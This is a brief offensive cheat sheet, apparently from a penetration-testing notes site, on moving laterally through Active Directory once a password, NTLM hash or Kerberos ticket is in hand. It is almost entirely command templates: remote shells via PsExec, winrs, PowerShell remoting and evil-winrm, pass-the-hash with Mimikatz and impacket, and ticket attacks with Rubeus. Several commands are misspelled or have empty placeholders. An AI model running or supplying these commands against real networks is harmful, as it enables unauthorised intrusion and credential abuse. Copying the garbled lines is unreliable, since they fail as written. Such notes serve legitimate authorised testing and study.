Neko

Further Active Directory Access

What to do once you have a password, hash, or ticket.

Last updated: May 4th, 2023

Unrestricted Access

winrs -r:{HOSTNAME} cmd

.\psExec.exe \\{HOSTNAME} cmd

$sess = New-PSSession -ComputerName {HOST}
Enter-PSSession -Session $sess

$sess= New-PSSession -ComputerName {HOST}
Invoke-Sommand -Session $sess -ScriptBlock {ipconfig;whoami;pwd}

Invoke-WSManWinRM -hostname {HOST} -command cmd

With a Password (PTP)

winr -r:{HOST} -u:{DOMAIN}/{USER} -p:{PASS} cmd
.\PsExec.exe -u {DOMAIN}/{USER} -p {PASS} \\{HOSTNAME} cmd
impacket-psexec {DOMAIN}/{USER}:{PASS}@{IP}
Invoke-WSManWinRM -hostname {HOST} -command cmd -user {DOMAIN}\{USER} -password {PASS}
evil-winrm -i {ip} -u {DOMAIN}/{USER}' -p {PASS}
rdesktop -a 16 {IP} -u {DOMAIN}\{USER} -p {PASS}
xfreerdp /v:{IP} /u:"{USER}" /p:{PASS}

With a Hash (PTH)

Invoke-Mimikatz -Command '''sekurlsa::pth/user:{USER} /domain:{DOMAIN} /ntlm:{NTLM} /run:powershell.exe
impacket-psexec -hashes ":{NTLM} {USER}@{IP}
evil-winrm -u {username} -H {hash} -i {IP}
pth-winexe -U {Domain}/{USER}%{NT:LM} // {IP} cmd

With a Ticket (PTT)

Invoke-Mimikatz -Command '''kerberos::ptt '''
Rubeus.exe ptt /ticket:

.\PsExec.exe -accepteula \\ cmd
winrs -r: cmd

OverPass the Hash (PTK)

Rubeus.exe asktgt /user: /rc4: /ptt
.\PsExec.exe -accepteula \\ cmd
winrs -r: cmd

Invoke-Mimikatz -Command '''sekurlsa::pth /user: /domain: /aes256: /run:cmd.exe'''

1- impacket-getTGT / -hashes ":"
2- export KRB5CCNAME=$(pwd)/.ccache
3- impacket-psexec /@ -k -no-pass